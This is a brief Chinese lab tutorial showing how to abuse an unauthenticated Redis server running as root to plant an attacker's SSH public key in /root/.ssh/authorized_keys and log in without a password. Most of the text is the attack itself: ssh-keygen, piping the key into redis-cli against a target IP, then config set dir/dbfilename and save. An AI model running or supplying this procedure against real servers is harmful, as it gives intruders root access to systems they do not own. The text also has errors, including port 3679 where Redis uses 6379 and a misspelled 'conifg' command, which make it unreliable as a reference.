原理
利用redis的备份功能,写入ssh公钥
利用条件
1.开放3679端口和22端口
2.服务器用root权限启动redis服务(能够切换目录)
影响版本
小于redis-4.0.10
实验步骤
1.在目标机上使用root权限启动redis服务
1.在攻击机上创建ssh密钥对
ssh-keygen
2.创建1.txt,把攻击机的公钥写入1.txt,并传入目标redis服务的缓存
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > 1.txt cat 1.txt | redis-cli -h 192.168.117.10
3.修改redis的配置
config set dir /root/.ssh conifg set dbfilename authorized_keys save quit
4.ssh免密登录